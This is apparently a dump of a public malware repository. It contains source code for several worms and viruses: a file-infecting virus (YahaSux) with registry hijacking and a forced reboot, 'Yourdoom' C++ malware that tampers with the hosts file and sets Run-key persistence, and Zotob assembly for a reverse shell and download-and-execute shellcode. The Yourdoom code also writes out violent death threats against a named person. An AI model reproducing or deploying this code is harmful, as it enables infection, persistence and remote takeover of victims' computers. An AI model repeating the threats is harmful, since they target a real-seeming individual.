(!TerminateProcess(PrHandle, NULL)) 165 | return false; 166 | else 167 | return true; 168 | CloseHandle(PrHandle); 169 | } 170 | counter++; 171 | } 172 | return false; 173 | } 174 | 175 | void main(int argc, char **argv) 176 | { 177 | struct HKEY__* reghandle; 178 | char sysdir[50],windir[40],MyDocsPath[MAX_PATH],winstartpath[70]; 179 | DWORD MyDocsLength=MAX_PATH; 180 | WIN32_FIND_DATA FileData; 181 | HANDLE SearchHandle,hToken; 182 | FILE* MailFile; 183 | const unsigned char startpage[]="http://127.0.0.1"; 184 | TOKEN_PRIVILEGES tkp; 185 | OSVERSIONINFO winver; 186 | 187 | winver.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); 188 | GetVersionEx(&winver); 189 | 190 | GetSystemDirectory(sysdir,50); 191 | SetCurrentDirectory(sysdir); 192 | 193 | if(FileExists("nav32_loader.exe")&&!(FileExists("c:\\MathMagic.scr"))) 194 | { 195 | WriteVirus(argv[0],"winstart.exe"); 196 | strcpy(winstartpath,sysdir); 197 | strcat(winstartpath,"\\winstart.exe"); 198 | 199 | if(KillWinServices()) 200 | { 201 | RegSetValue(HKEY_LOCAL_MACHINE,"Software\\Classes\\exefile\\shell\\open\\command",REG_SZ,"\"%1\" %*",7); 202 | RegSetValue(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",REG_SZ,"\"%1\" %*",7); 203 | RegSetValue(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",REG_SZ,winstartpath,strlen(winstartpath)); 204 | 205 | RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",®handle); 206 | RegQueryValueEx(reghandle,"Personal",NULL,NULL,(BYTE*)MyDocsPath,&MyDocsLength); 207 | RegCloseKey(reghandle); 208 | 209 | RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",®handle); 210 | RegDeleteValue(reghandle,"WinServices"); 211 | RegCloseKey(reghandle); 212 | 213 | DeleteFile("WinServices.exe"); 214 | DeleteFile("nav32_loader.exe"); 215 | DeleteFile("hotmail_hack.exe"); 216 | DeleteFile("friendship.scr "); 217 | DeleteFile("world_of_friendship.scr "); 218 | DeleteFile("shake.scr"); 219 | DeleteFile("Sweet.scr"); 220 | DeleteFile("Be_Happy.scr "); 221 | DeleteFile("Friend_Finder.exe"); 222 | DeleteFile("I_Like_You.scr"); 223 | DeleteFile("love.scr"); 224 | DeleteFile("dance.scr"); 225 | DeleteFile("GC_Messenger.exe"); 226 | DeleteFile("True_Love.scr"); 227 | DeleteFile("Friend_Happy.scr"); 228 | DeleteFile("Best_Friend.scr"); 229 | DeleteFile("life.scr"); 230 | DeleteFile("colour_of_life.scr"); 231 | DeleteFile("friendship_funny.scr"); 232 | DeleteFile("funny.scr"); 233 | 234 | SetCurrentDirectory(MyDocsPath); 235 | SearchHandle=FindFirstFile("*.*",&FileData); 236 | SetFileAttributes(FileData.cFileName,FILE_ATTRIBUTE_NORMAL); 237 | 238 | while(FindNextFile(SearchHandle,&FileData)) 239 | SetFileAttributes(FileData.cFileName,FILE_ATTRIBUTE_NORMAL); 240 | } 241 | } 242 | 243 | 244 | if(strstr(argv[0],"winstart.exe")) 245 | { 246 | DeleteFile("tcpsvs32.exe"); 247 | MessageBox(NULL,"Hi there.. it seems you were infected with Yaha.k. That worm however, written by an idiot who sPeLlS lIkE tHiS, abused my website and got me to receive the complaints. Therefore, I have just disinfected you. Don't worry tho.. as I didn't wanna steal from you, I gave you this virus (Win32.HLLP.YahaSux) in return :)\n\nGreetz,\n\nGigabyte [Metaphase VX Team]","Exchange viruses?",MB_OK|MB_ICONINFORMATION); 248 | } 249 | 250 | if(FileExists("c:\\progra~1\\mirc\\mirc.exe")) 251 | { 252 | SetCurrentDirectory("c:\\progra~1\\mirc\\download"); 253 | SearchHandle=FindFirstFile("*.exe",&FileData); 254 | if(SearchHandle!=INVALID_HANDLE_VALUE) 255 | { 256 | if(VirCheck(FileData.cFileName)!='g') 257 | InfectFile(FileData.cFileName,argv[0]); 258 | 259 | while(FindNextFile(SearchHandle,&FileData)) 260 | { 261 | if(VirCheck(FileData.cFileName)!='g') 262 | InfectFile(FileData.cFileName,argv[0]); 263 | } 264 | 265 | DeleteFile("yahasux.exe"); 266 | } 267 | } 268 | 269 | RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",®handle); 270 | RegSetValueEx(reghandle,"Start Page",0,REG_SZ,startpage,16); 271 | 272 | GetWindowsDirectory(windir,40); 273 | SetCurrentDirectory(windir); 274 | 275 | if(winver.dwPlatformId==VER_PLATFORM_WIN32_NT) 276 | { 277 | SearchHandle=FindFirstFile("*.exe",&FileData); 278 | if(VirCheck(FileData.cFileName)!='g') 279 | InfectFile(FileData.cFileName,argv[0]); 280 | 281 | while(FindNextFile(SearchHandle,&FileData)) 282 | { 283 | if(strcmp(FileData.cFileName,"explorer.exe")&&VirCheck(FileData.cFileName)!='g'&&strcmp(FileData.cFileName,"yahasux.exe")) 284 | InfectFile(FileData.cFileName,argv[0]); 285 | } 286 | 287 | DeleteFile("yahasux.exe"); 288 | } 289 | 290 | if(!(FileExists("c:\\MathMagic.scr"))) 291 | { 292 | WriteVirus(argv[0],"c:\\MathMagic.scr"); 293 | fwrite(MailData,2346,1,MailFile=fopen("yahasux.vbs","wb")); 294 | fclose(MailFile); 295 | ShellExecute(NULL,"open","yahasux.vbs",NULL,NULL,SW_HIDE); 296 | 297 | if(winver.dwPlatformId==VER_PLATFORM_WIN32_NT) 298 | { 299 | OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken); 300 | LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); 301 | tkp.PrivilegeCount=1; 302 | tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; 303 | AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0); 304 | } 305 | 306 | Sleep(40000); 307 | ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0); 308 | } 309 | 310 | if(!(strstr(argv[0],"winstart.exe")||strstr(argv[0],"MathMagic.scr")||strstr(argv[0],"yahasux.exe"))) 311 | { 312 | CopyOrig(argv[0],"screwyaha.exe"); 313 | WinExec("screwyaha.exe",SW_SHOWNORMAL); 314 | while(!DeleteFile("screwyaha.exe")){} 315 | } 316 | } -------------------------------------------------------------------------------- /yourdoom/Icon_1.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/yourdoom/Icon_1.ico -------------------------------------------------------------------------------- /yourdoom/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/yourdoom/icon.ico -------------------------------------------------------------------------------- /yourdoom/main.cpp: -------------------------------------------------------------------------------- 1 | /* written by bob.....Fufill your dreams. Mine has come true...has yours??" */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | using namespace std; 13 | 14 | const char msg1[]="This is Yourdoom. this malware is just for experimental purposes only"; 15 | 16 | //please add a backdoor component, email harvester and SMTP engine please?? i don't know how :( 17 | 18 | int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, 19 | LPSTR lpszArgument, int nFunsterStil) 20 | 21 | { 22 | HWND hide; //hides this console windows from the user 23 | AllocConsole(); 24 | hide = FindWindowA("ConsoleWindowClass", NULL); 25 | ShowWindow(hide, 0); 26 | 27 | //create a mutex for yourdoom 28 | { 29 | CreateMutexA(NULL, TRUE, "yourdoom!!!!!"); 30 | if (GetLastError() == ERROR_ALREADY_EXISTS) 31 | ExitProcess(0); 32 | return 0; 33 | } 34 | 35 | /*overwrite localhost file 36 | { 37 | char host[MAX_PATH]; 38 | GetSystemDirectory(host, sizeof(host)); 39 | strcat(host, "\\Drivers\\ETC\\HOSTS"); 40 | const char* buffer = 41 | "127.0.0.1 www.myspace.com"; 42 | "127.0.0.1 www.norton.com"; 43 | "127.0.0.1 www.kazaa.com"; 44 | "127.0.0.1 www.kazaa.de"; 45 | "127.0.0.1 www.kaspersky.com"; 46 | "127.0.0.1 www.kasperskylabs.com"; 47 | "127.0.0.1 www.symantec.com"; 48 | "127.0.0.1 www.housecall.com"; 49 | "127.0.0.1 www.grisoft.com"; 50 | "127.0.0.1 www.safety.live.com"; 51 | "127.0.0.1 www.vxchoas.cjb.net"; 52 | "127.0.0.1 www.live.com"; 53 | "127.0.0.1 www.google.com"; 54 | "127.0.0.1 www.nai.com"; 55 | "127.0.0.1 www.awil.com"; 56 | "127.0.0.1 www.avast.com"; 57 | "127.0.0.1 www.ca.com"; 58 | "127.0.0.1 www3.ca.com"; 59 | "127.0.0.1 www.microsoft.com"; 60 | "127.0.0.1 www.getfirefox.com"; 61 | "127.0.0.1 www.windowsmarketplace.com"; 62 | "127.0.0.1 www.dell.com"; 63 | "127.0.0.1 www.hewlett-packard.com"; 64 | "127.0.0.1 www.myspace.com"; //god dawm alot of people at school won't shut up about myspace!!! 65 | "127.0.0.1 myspace.com"; //need to be sure it get's blocked 66 | "127.0.0.1 www.apple.com"; 67 | "127.0.0.1 www.compaq.com"; //i highly doubt it but try to block some computer manufacturer sites 68 | "127.0.0.1 www.linux.org"; 69 | "127.0.0.1 www.pandasoftware.com"; 70 | "127.0.0.1 127.0.0.1"; 71 | "127.0.0.1 www.microsoft.net"; 72 | 73 | DWORD byte; 74 | HANDLE hFile = CreateFile(host, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); 75 | BOOL bSuccess = WriteFile ( hFile, buffer, strlen(buffer), &byte, NULL); 76 | CloseHandle(hFile); 77 | } 78 | */ 79 | 80 | //let's screw up the hosts file sense idk how to overwrite it. 81 | system("del C:\WINDOWS\System32\drivers\etc\hosts"); 82 | system("echo 127.0.0.1 http://www.myspace.com >> C:\WINDOWS\System32\drivers\etc\hosts"); 83 | //#endif 84 | 85 | //let's run notepad on the infected computer 86 | char Notepad[MAX_PATH]="notepad.exe"; 87 | ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE); 88 | 89 | //let's run Calculator on the infected computer 90 | char Calculator[MAX_PATH]="calc.exe"; 91 | ShellExecute(NULL,"open",Calculator,NULL,NULL,SW_MAXIMIZE); 92 | 93 | //let's run microsoft word 94 | char Microsoft_Office_Word[MAX_PATH]="winword.exe"; 95 | ShellExecute(NULL,"open",Microsoft_Office_Word,NULL,NULL,SW_MAXIMIZE); 96 | 97 | //let's run internet explorer on the infected computer 98 | char Internet_Explorer[MAX_PATH]="iexplore.exe"; 99 | ShellExecute(NULL,"open",Internet_Explorer,NULL,NULL,SW_MAXIMIZE); 100 | 101 | //let's run telnet server on the infected computer 102 | char TlntSvr[MAX_PATH]="tlnsvr.exe"; 103 | ShellExecute(NULL,"open",TlntSvr,NULL,NULL,SW_MAXIMIZE); 104 | 105 | //let's run wordpad on the infected computer 106 | char Wordpad[MAX_PATH]="write.exe"; 107 | ShellExecute(NULL,"open",Wordpad,NULL,NULL,SW_MAXIMIZE); 108 | 109 | //this is where we turn off and on the monitor 110 | SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); 111 | Sleep(500); 112 | SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) -1); 113 | 114 | /* copy to the hard drive */ 115 | char system[MAX_PATH]; 116 | char pathtofile[MAX_PATH]; 117 | HMODULE GetModH = GetModuleHandle(NULL); 118 | GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); 119 | GetSystemDirectory(system,sizeof(system)); //get %system32% 120 | strcat(system,"\\yourdoom.exe"); //file name copied to %system32%\yourdoom.exe 121 | CopyFile(pathtofile,system,false); 122 | 123 | //this is where we make the registry entries 124 | HKEY hKey; 125 | RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); 126 | RegSetValueEx(hKey, "Microsoft Windows Update",0,REG_SZ,(const unsigned char*)system,sizeof(system)); 127 | RegCloseKey(hKey); 128 | 129 | //create some files 130 | { 131 | char txtfile[MAX_PATH]; 132 | char tempdir[MAX_PATH]; 133 | char ttxtline[MAX_PATH]; 134 | char txtline[MAX_PATH]; 135 | char This_File[MAX_PATH]; 136 | HANDLE f; 137 | DWORD r; 138 | PROCESS_INFORMATION pinfo; 139 | STARTUPINFO sinfo; 140 | GetTempPath(sizeof(tempdir), tempdir); 141 | sprintf(txtfile, "%s\\kevin_you_suck_dick.exe", tempdir); 142 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 143 | if (f != INVALID_HANDLE_VALUE) { 144 | // write a TXT Encoded PIF (MS-DOS Executable) file flaming kevin 145 | WriteFile(f, "I just want to say.....Kevin Shut your fucking mouth, because it looks like a donkeys ass", 105, &r, NULL); 146 | CloseHandle(f); 147 | 148 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 149 | sinfo.cb = sizeof(sinfo); 150 | sinfo.wShowWindow = SW_HIDE; 151 | memset(This_File,0,sizeof(This_File)); 152 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 153 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 154 | 155 | // execute the TEXT file 156 | //CreateProcess(NULL, txtline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo); 157 | 158 | char txtfile[MAX_PATH]; 159 | char tempdir[MAX_PATH]; 160 | char ttxtline[MAX_PATH]; 161 | char txtline[MAX_PATH]; 162 | char This_File[MAX_PATH]; 163 | HANDLE f; 164 | DWORD r; 165 | PROCESS_INFORMATION pinfo; 166 | STARTUPINFO sinfo; 167 | GetTempPath(sizeof(tempdir), tempdir); 168 | sprintf(txtfile, "%s\\XDNS.dll", tempdir); 169 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 170 | if (f != INVALID_HANDLE_VALUE) { 171 | // write a random generated DLL in %TEMP%/XDNS.dll 172 | WriteFile(f, "KILLING YOU KEVIN\r\n", 105, &r, NULL); 173 | CloseHandle(f); 174 | 175 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 176 | sinfo.cb = sizeof(sinfo); 177 | sinfo.wShowWindow = SW_HIDE; 178 | memset(This_File,0,sizeof(This_File)); 179 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 180 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 181 | 182 | char txtfile[MAX_PATH]; 183 | char tempdir[MAX_PATH]; 184 | char ttxtline[MAX_PATH]; 185 | char txtline[MAX_PATH]; 186 | char This_File[MAX_PATH]; 187 | HANDLE f; 188 | DWORD r; 189 | PROCESS_INFORMATION pinfo; 190 | STARTUPINFO sinfo; 191 | GetTempPath(sizeof(tempdir), tempdir); 192 | sprintf(txtfile, "%s\\xproxy.dll", tempdir); 193 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 194 | if (f != INVALID_HANDLE_VALUE) { 195 | // write a random generated DLL in %TEMP%/xproxy.dll 196 | WriteFile(f, "I WILL STAB YOU IN THE BACK OF THE HEAD KEVIN.\r\n", 105, &r, NULL); 197 | CloseHandle(f); 198 | 199 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 200 | sinfo.cb = sizeof(sinfo); 201 | sinfo.wShowWindow = SW_HIDE; 202 | memset(This_File,0,sizeof(This_File)); 203 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 204 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 205 | 206 | char txtfile[MAX_PATH]; 207 | char tempdir[MAX_PATH]; 208 | char ttxtline[MAX_PATH]; 209 | char txtline[MAX_PATH]; 210 | char This_File[MAX_PATH]; 211 | HANDLE f; 212 | DWORD r; 213 | PROCESS_INFORMATION pinfo; 214 | STARTUPINFO sinfo; 215 | GetTempPath(sizeof(tempdir), tempdir); 216 | sprintf(txtfile, "%s\\yourdoom.sys", tempdir); 217 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 218 | if (f != INVALID_HANDLE_VALUE) { 219 | // write a random generated DLL in %TEMP%/youdoom.sys 220 | WriteFile(f, "KEVIN I'M GOING TO MURDER YOU IN COLD BLOOD. I'M FUCKING GOING TO SHOOT YOU WITH A M16 OVER YOUR GRAVE. \r\n", 105, &r, NULL); 221 | CloseHandle(f); 222 | 223 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 224 | sinfo.cb = sizeof(sinfo); 225 | sinfo.wShowWindow = SW_HIDE; 226 | memset(This_File,0,sizeof(This_File)); 227 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 228 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 229 | 230 | char txtfile[MAX_PATH]; 231 | char tempdir[MAX_PATH]; 232 | char ttxtline[MAX_PATH]; 233 | char txtline[MAX_PATH]; 234 | char This_File[MAX_PATH]; 235 | HANDLE f; 236 | DWORD r; 237 | PROCESS_INFORMATION pinfo; 238 | STARTUPINFO sinfo; 239 | GetTempPath(sizeof(tempdir), tempdir); 240 | sprintf(txtfile, "%s\\xproxy.sys", tempdir); 241 | f = CreateFile(txtfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); 242 | if (f != INVALID_HANDLE_VALUE) { 243 | // write a random generated DLL in %TEMP%/xproxy.sys 244 | WriteFile(f, "I'm going to kill you", 105, &r, NULL); 245 | CloseHandle(f); 246 | 247 | memset(&sinfo, 0, sizeof(STARTUPINFO)); 248 | sinfo.cb = sizeof(sinfo); 249 | sinfo.wShowWindow = SW_HIDE; 250 | memset(This_File,0,sizeof(This_File)); 251 | GetModuleFileName(NULL, This_File, sizeof(This_File)); 252 | ExpandEnvironmentStrings(ttxtline, txtline, sizeof(txtline)); 253 | 254 | /*#define site "http:\\SITE.com/viruses/virus.exe"; 255 | //yourdoom will download file from this site 256 | #define path "C:\\bling_bling_ssh.exe"; 257 | //path where to save file 258 | */ 259 | 260 | //eject the cdtray 261 | { 262 | ofstream cdopen; 263 | cdopen.open("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startups\\cd.vbs",ios::out); 264 | cdopen << "do" << endl; 265 | cdopen << "wscript.sleep 100" << endl; 266 | cdopen << "Set oWMP = CreateObject(\"WMPlayer.OCX.7\")" << endl; 267 | cdopen << "Set colCDROMs = oWMP.cdromCollection" << endl; 268 | cdopen << "if colCDROMs.Count then" << endl; 269 | cdopen << "For i = 0 to colCDROMs.Count - 1" << endl; 270 | cdopen << "colCDROMs.Item(i).Eject" << endl; 271 | cdopen << "Next" << endl; 272 | cdopen << "End If" << endl; 273 | cdopen << "loop" << endl; 274 | } 275 | //flip the mouse buttons using this handy dandy Batch Script :) 276 | { 277 | ofstream mouse; 278 | mouse.open("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\mouse.cmd",ios::out); 279 | mouse << "RUNDLL32 USER32.DLL,SwapMouseButton" <> 8) & 0xFF)) << 16) ) 64 | 65 | push edx 66 | push edx 67 | push edx 68 | push edx 69 | push byte 1 70 | push byte 2 71 | call DWORD _WSASocket 72 | xchg ebx, eax 73 | 74 | mov edx, esp 75 | push byte 0x10 76 | push edx 77 | push ebx 78 | call connect 79 | add esp, byte 0x10 80 | or eax, eax 81 | jz .createprocess 82 | 83 | .retry 84 | push ebx 85 | call closesocket 86 | 87 | push byte (CBACK_TIMEOUT / CBACK_CHK_CONN) 88 | pop ecx 89 | 90 | .sleep 91 | push ecx 92 | push CBACK_CHK_CONN 93 | call Sleep 94 | pop ecx 95 | cmp DWORD [CONNECTED], 0 96 | je .exit 97 | 98 | loop .sleep 99 | jmp short .gethost 100 | 101 | .exit 102 | push DWORD [MTX_CBACK] 103 | call ReleaseMutex 104 | 105 | push BYTE 0 106 | call ExitThread 107 | 108 | 109 | .createprocess 110 | push byte 0x11 111 | pop ecx 112 | mov edx, edi 113 | mov edi, esp 114 | lea esi, [edi + 0x44] 115 | push esi 116 | push edi 117 | 118 | push edi 119 | rep stosd 120 | pop edi 121 | 122 | mov byte [edi], 0x44 123 | inc byte [edi + 0x2c] ;STARTF_USESHOWWINDOW 124 | inc byte [edi + 0x2d] ;STARTF_USESTDHANDLES 125 | lea edi, [edi + 0x38] 126 | mov eax, ebx 127 | stosd 128 | stosd 129 | stosd 130 | mov edi, edx 131 | push ecx 132 | push ecx 133 | push ecx 134 | push eax ;TRUE 135 | push ecx 136 | push ecx 137 | push STR_CMD 138 | push ecx 139 | call CreateProcess 140 | 141 | lodsd 142 | push eax 143 | push byte -1 144 | push eax 145 | call WaitForSingleObject 146 | 147 | call CloseHandle 148 | push DWORD [esi] 149 | call CloseHandle 150 | 151 | jmp short .retry 152 | -------------------------------------------------------------------------------- /zotob/Zotob Code/RELEASE/make.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | del %1.obj 2>nul 4 | REM del %1.exe >nul 5 | nasmw -O9 -fwin32 %2 %3 %4 %5 %1.asm 6 | c:\masm32\bin\link /NOLOGO /RELEASE /entry:entry /subsystem:windows /STACK:2097152,1000 %1.obj c:\masm32\lib\kernel32.lib c:\masm32\lib\wininet.lib c:\masm32\lib\wsock32.lib c:\masm32\lib\user32.lib c:\masm32\lib\MSVCRT.LIB c:\masm32\lib\advapi32.lib /OUT:%1.exe 7 | del %1.obj 2>nul 8 | -------------------------------------------------------------------------------- /zotob/Zotob Code/RELEASE/shellcode.asm: -------------------------------------------------------------------------------- 1 | ; Title: Win32 API Download/Execute file 2 | ; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 3 | 4 | 5 | ;To compile: 6 | ;nasmw -fbin -O6 shellcode.asm 7 | 8 | 9 | FILE_ATTRIBUTE_HIDDEN EQU 2 10 | FILE_ATTRIBUTE_SYSTEM EQU 4 11 | CREATE_ALWAYS EQU 2 12 | FILE_SHARE_READ EQU 1 13 | GENERIC_WRITE EQU 0x40000000 14 | 15 | BUFF_SIZE EQU 512 16 | 17 | 18 | %xdefine FILENAME 'mscatp.exe' 19 | 20 | 21 | CPU 386 22 | [BITS 32] 23 | 24 | 25 | GLOBAL _entry 26 | _entry: 27 | 28 | cld 29 | call Kernel32Base 30 | 31 | 32 | ; ARGS: edx: API name hash 33 | ; ebx: dll address 34 | ; Return: eax: API address 35 | ; ERROR: ecx == 0 36 | LGetProcAddress: ; USES ebx ebp esi edi 37 | push ebp 38 | push esi 39 | push edi 40 | mov eax, [ebx + 0x3c] 41 | lea esi, [ebx + eax + 0x78] 42 | lodsd ; Export Table RVA 43 | push dword [esi] ; Export Table size 44 | add eax, ebx ; Export Table address 45 | push eax 46 | mov ecx, [eax + 0x18] ; NumberOfNames 47 | mov ebp, [eax + 0x20] 48 | add ebp, ebx ; AddressOfNames 49 | 50 | .Nextf 51 | jecxz .End1 52 | dec ecx 53 | mov esi, [ebp + ecx * 4] 54 | add esi, ebx 55 | xor edi, edi 56 | 57 | .Lhash 58 | xor eax, eax 59 | lodsb 60 | cmp al, ah 61 | je .Fh 62 | ror edi, 13 63 | add edi, eax 64 | jmp short .Lhash 65 | 66 | .Fh 67 | cmp edi, edx 68 | jnz .Nextf 69 | 70 | pop ebp ; Export Table 71 | mov edx, [ebp + 0x24] 72 | add edx, ebx ; AddressOfNameOrdinals 73 | mov cx, [edx + ecx * 2] 74 | mov edx, [ebp + 0x1C] 75 | add edx, ebx ; AddressOfFunctions 76 | mov eax, [edx + 4 * ecx] 77 | add eax, ebx 78 | 79 | .FDone 80 | pop ecx ; Export Table size 81 | push eax 82 | sub eax, ebp 83 | cmp eax, ecx 84 | pop eax 85 | ja .End2 86 | 87 | xchg esi, eax ; Export Forwarding 88 | sub esp, byte 0x40 89 | mov edi, esp 90 | 91 | .FCopy 92 | stosb 93 | lodsb 94 | cmp al, '.' 95 | jne .FCopy 96 | 97 | mov byte [edi], 0 98 | mov edi, esp 99 | inc edi 100 | 101 | mov ebp, [esp + 0x48] ; old EBP 102 | push edi 103 | call [ebp - __LOADLIBRARY] 104 | push esi 105 | push eax 106 | call [ebp - __GETPROCADDR] 107 | add esp, byte (0x40 - 8) 108 | mov cl, 1 ;ecx != 0 109 | 110 | .End1 111 | add esp, byte 8 112 | .End2 113 | pop edi 114 | pop esi 115 | pop ebp 116 | ret 117 | 118 | 119 | Kernel32Base: 120 | mov eax, [fs:0x30] 121 | test eax, eax 122 | js .find_kernel32_9x 123 | .find_kernel32_nt 124 | mov eax, [eax + 0x0c] 125 | mov esi, [eax + 0x1c] 126 | lodsd 127 | mov ebx, [eax + 0x8] 128 | jmp short .kf 129 | .find_kernel32_9x 130 | mov eax, [eax + 0x34] 131 | mov ebx, [eax + 0xB8] 132 | .kf 133 | 134 | pop edi 135 | 136 | ; ebx = kernel32 137 | ; edi = LGetProcAddress 138 | 139 | mov ebp, esp 140 | push ebx ; __KERNEL32 141 | 142 | mov edx, 0xec0e4e8e ; LoadLibraryA 143 | call edi 144 | push eax ; __LOADLIBRARY 145 | 146 | mov edx, 0x7c0dfcaa ; GetProcAddress 147 | call edi 148 | push eax ; __GETPROCADDR 149 | push eax 150 | 151 | 152 | __KERNEL32 EQU 0x4 ;[ebp - 4] 153 | __LOADLIBRARY EQU 0x8 ;[ebp - 8] 154 | __GETPROCADDR EQU 0xC ;[ebp - 0xC] 155 | DL_FILENAME EQU 0x10 ;[ebp - 0xC] 156 | 157 | STACK_CNT EQU DL_FILENAME 158 | 159 | call .LoadK32 160 | 161 | .KERNEL32 162 | CloseHandle EQU ((1*4) + STACK_CNT) 163 | dd 0x0ffd97fb 164 | CreateFile EQU ((2*4) + STACK_CNT) 165 | dd 0x7c0017a5 166 | WriteFile EQU ((3*4) + STACK_CNT) 167 | dd 0xe80a791f 168 | ExitThread EQU ((4*4) + STACK_CNT) 169 | dd 0x60e0ceef 170 | CreateProcess EQU ((5*4) + STACK_CNT) 171 | dd 0x16b3fe72 172 | 173 | 174 | K32_APINUM EQU (($-.KERNEL32)/4) 175 | 176 | .LoadK32 177 | pop esi 178 | push K32_APINUM 179 | pop ecx 180 | 181 | .k32 182 | push ecx 183 | lodsd 184 | xchg edx, eax 185 | call edi 186 | pop ecx 187 | push eax ;save APIs on stack 188 | 189 | loop .k32 190 | 191 | 192 | call .LoadWsock32 193 | 194 | db 'WS2_32', 0,0 195 | 196 | .WSOCK32 197 | 198 | WSAStartup EQU (((1*4) + STACK_CNT) + (K32_APINUM*4)) 199 | dd 0x3bfcedcb 200 | socket EQU (((2*4) + STACK_CNT) + (K32_APINUM*4)) 201 | dd 0x492f0b6e 202 | closesocket EQU (((3*4) + STACK_CNT) + (K32_APINUM*4)) 203 | dd 0x79c679e7 204 | connect EQU (((4*4) + STACK_CNT) + (K32_APINUM*4)) 205 | dd 0x60aaf9ec 206 | recv EQU (((5*4) + STACK_CNT) + (K32_APINUM*4)) 207 | dd 0xe71819b6 208 | 209 | WSOCK32_APINUM EQU (($-.WSOCK32)/4) 210 | 211 | .LoadWsock32 212 | pop esi 213 | 214 | push esi 215 | call [ebp - __LOADLIBRARY] 216 | xchg ebx, eax 217 | 218 | push WSOCK32_APINUM 219 | pop ecx 220 | lodsd 221 | lodsd 222 | 223 | .Wsock32 224 | push ecx 225 | lodsd 226 | xchg edx, eax 227 | call edi 228 | pop ecx 229 | push eax ;save APIs on stack 230 | 231 | loop .Wsock32 232 | 233 | sub esp, BUFF_SIZE 234 | push esp 235 | push 2 236 | call [ebp - WSAStartup] 237 | 238 | xor eax, eax 239 | push eax 240 | push eax 241 | push eax 242 | push 1 243 | push 2 244 | call [ebp - socket] 245 | xchg ebx, eax 246 | 247 | push 0x0100007f ;host: 127.0.0.1 248 | push 0x11220002 ;port: 8721 249 | mov edx, esp 250 | 251 | push 0 252 | push FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM 253 | push CREATE_ALWAYS 254 | push 0 255 | push FILE_SHARE_READ 256 | push GENERIC_WRITE 257 | call .lpFileName 258 | DB FILENAME,0 259 | 260 | .lpFileName 261 | pop eax 262 | mov [ebp - DL_FILENAME], eax 263 | push eax 264 | 265 | push 0x10 266 | push edx 267 | push ebx 268 | call [ebp - connect] 269 | or eax, eax 270 | jnz .cs 271 | 272 | call [ebp - CreateFile] 273 | xchg esi, eax 274 | inc eax 275 | jz .cs 276 | 277 | mov edi, esp 278 | .recvloop 279 | push 0 280 | push BUFF_SIZE 281 | push edi 282 | push ebx 283 | call [ebp - recv] 284 | or eax, eax 285 | jle .cf 286 | 287 | push 0 288 | push esp 289 | push eax 290 | push edi 291 | push esi 292 | call [ebp - WriteFile] 293 | jmp short .recvloop 294 | 295 | .cf 296 | push esi 297 | call [ebp - CloseHandle] 298 | 299 | .cs 300 | push ebx 301 | call [ebp - closesocket] 302 | 303 | push esp 304 | lea edi, [esp + 0x14] 305 | push edi 306 | xor eax, eax 307 | push 0x44 308 | pop ecx 309 | mov [edi], ecx 310 | inc edi 311 | rep stosb 312 | 313 | mov cl, 7 314 | .push0 315 | push eax 316 | loop .push0 317 | push DWORD [ebp - DL_FILENAME] 318 | call [ebp - CreateProcess] 319 | 320 | call [ebp - CloseHandle] 321 | call [ebp - CloseHandle] 322 | 323 | .exit 324 | push 0 325 | call [ebp - 